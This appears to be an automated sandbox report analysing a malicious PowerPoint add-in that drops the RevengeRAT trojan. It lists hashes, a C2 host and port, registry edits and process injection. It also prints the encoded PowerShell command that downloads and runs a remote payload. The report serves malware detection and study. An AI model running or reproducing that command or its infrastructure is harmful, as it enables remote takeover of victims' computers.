Analysis
-
max time kernel
151s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
18-04-2024 01:30
Static task
static1
Behavioral task
behavioral1
Sample
013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda.ppam
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda.ppam
Resource
win10v2004-20240412-en
General
-
Target
013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda.ppam
-
Size
28KB
-
MD5
7e0c3f4ee3bb201339b0be1e73142374
-
SHA1
bb1dbdfd0cbbdb0f33dba0502d896224ba567680
-
SHA256
013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda
-
SHA512
5398377cd90f8aa3b8834eef60fcf438c9eeed154e78447b902e04b1f5071726aa03c2bcca5280da1c8e06649b9a01f7645638ae6cd09f8a68f69fe41f299da4
-
SSDEEP
768:VPKiNgILNl1pb2GdSXlWEsusK+oCx7oho6n7vtxUkO:VC6vgIS4tokyH7lmkO
Malware Config
Extracted
revengerat
NyanCatRevenge
craxsrat.ddns.com.br:333
27d7e6701f5e
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process 2448 2964 powershell.exe POWERPNT.EXE -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 2448 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2448 set thread context of 1208 2448 powershell.exe RegSvcs.exe -
Processes:
POWERPNT.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Toolbar POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel POWERPNT.EXE -
Modifies registry class 64 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493474-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A74-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493466-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A52-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E551-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A78-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\ = "FreeformBuilder" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CF-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F} POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E555-4FF5-48F4-8215-5505F990966F}\ = "MediaBookmark" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493498-5A91-11CF-8700-00AA0060263B}\ = "TextStyles" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E550-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E557-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493483-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493465-5A91-11CF-8700-00AA0060263B}\ = "Hyperlink" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "UpBars" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C0-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A54-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "AxisTitle" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A73-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B}\ = "PrintRanges" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F6-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493487-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CB-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DD-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493454-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346B-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348F-5A91-11CF-8700-00AA0060263B}\ = "TextRange" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "Trendlines" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A61-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E551-4FF5-48F4-8215-5505F990966F}\ = "SectionProperties" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493455-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493499-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D1792378-E859-4F87-93AF-F0276AF0DA85}\2.0\0\win32 POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 2964 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2448 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
POWERPNT.EXEpid process 2964 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
POWERPNT.EXEpowershell.exedescription pid process target process PID 2964 wrote to memory of 2536 2964 POWERPNT.EXE splwow64.exe PID 2964 wrote to memory of 2536 2964 POWERPNT.EXE splwow64.exe PID 2964 wrote to memory of 2536 2964 POWERPNT.EXE splwow64.exe PID 2964 wrote to memory of 2536 2964 POWERPNT.EXE splwow64.exe PID 2964 wrote to memory of 2448 2964 POWERPNT.EXE powershell.exe PID 2964 wrote to memory of 2448 2964 POWERPNT.EXE powershell.exe PID 2964 wrote to memory of 2448 2964 POWERPNT.EXE powershell.exe PID 2964 wrote to memory of 2448 2964 POWERPNT.EXE powershell.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe PID 2448 wrote to memory of 1208 2448 powershell.exe RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda.ppam"1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AZwBvAG8AZwBsAGUAYQBwAGkAcwAuAGMAbwBtAC8AdgAwAC8AYgAvAHQAZQBzAHQAaQBuAGcALQBlAGEAZgAyADgALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AUgBFAFYARQBOAEcARQBSAC4AagBwAGcAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9AGIAOAA1AGIANABiADMANAAtADQAZgBiADkALQA0ADgANAAwAC0AYQAxAGQANwAtADMAMgA3AGEAZABlAGIAZQAwAGMANAA0AA0ACgAnACkAOwAgAA0ACgBHAHoATQBJAFQAWgBQAFIAVwBhAFQATQBvAEMAVwBiAGEAUwBNAFcAQgBkAEgASwBhAG8AcgBJAGMAdwBkAFkAbwBpAHoAeQBWAFIAdgBSAEkAUgBNAGYASABLAHoAawBYAEMAcwBwAFcAUwBIAGMAcwBjAEgARwBrAGgAUQBtAFcAVQB6AEsASABEAGgAawBHAHkAbwBMAHMAQwBkAHMAVABpAE0ADQAKAA==""2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1208-49-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/1208-66-0x0000000004890000-0x00000000048D0000-memory.dmpFilesize
256KB
-
memory/1208-65-0x0000000073AB0000-0x000000007419E000-memory.dmpFilesize
6.9MB
-
memory/1208-64-0x0000000004890000-0x00000000048D0000-memory.dmpFilesize
256KB
-
memory/1208-63-0x0000000073AB0000-0x000000007419E000-memory.dmpFilesize
6.9MB
-
memory/1208-57-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1208-60-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1208-53-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1208-52-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1208-41-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1208-43-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1208-45-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/1208-47-0x0000000000090000-0x000000000009A000-memory.dmpFilesize
40KB
-
memory/2448-22-0x000000006BA70000-0x000000006C01B000-memory.dmpFilesize
5.7MB
-
memory/2448-24-0x0000000002640000-0x0000000002680000-memory.dmpFilesize
256KB
-
memory/2448-29-0x0000000002490000-0x00000000024A8000-memory.dmpFilesize
96KB
-
memory/2448-33-0x0000000002490000-0x00000000024A8000-memory.dmpFilesize
96KB
-
memory/2448-31-0x0000000002490000-0x00000000024A8000-memory.dmpFilesize
96KB
-
memory/2448-35-0x0000000002490000-0x00000000024A8000-memory.dmpFilesize
96KB
-
memory/2448-37-0x0000000002490000-0x00000000024A8000-memory.dmpFilesize
96KB
-
memory/2448-39-0x0000000002490000-0x00000000024A8000-memory.dmpFilesize
96KB
-
memory/2448-40-0x00000000024D0000-0x00000000024D1000-memory.dmpFilesize
4KB
-
memory/2448-62-0x000000006BA70000-0x000000006C01B000-memory.dmpFilesize
5.7MB
-
memory/2448-61-0x000000006BA70000-0x000000006C01B000-memory.dmpFilesize
5.7MB
-
memory/2448-28-0x0000000002490000-0x00000000024A8000-memory.dmpFilesize
96KB
-
memory/2448-23-0x000000006BA70000-0x000000006C01B000-memory.dmpFilesize
5.7MB
-
memory/2964-0-0x000000002D691000-0x000000002D692000-memory.dmpFilesize
4KB
-
memory/2964-19-0x00000000006F0000-0x00000000007F0000-memory.dmpFilesize
1024KB
-
memory/2964-16-0x00000000006F0000-0x00000000007F0000-memory.dmpFilesize
1024KB
-
memory/2964-15-0x00000000006F0000-0x00000000007F0000-memory.dmpFilesize
1024KB
-
memory/2964-12-0x00000000006F0000-0x00000000007F0000-memory.dmpFilesize
1024KB
-
memory/2964-26-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2964-27-0x0000000072C0D000-0x0000000072C18000-memory.dmpFilesize
44KB
-
memory/2964-9-0x00000000006F0000-0x00000000007F0000-memory.dmpFilesize
1024KB
-
memory/2964-8-0x00000000006F0000-0x00000000007F0000-memory.dmpFilesize
1024KB
-
memory/2964-2-0x0000000072C0D000-0x0000000072C18000-memory.dmpFilesize
44KB
-
memory/2964-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB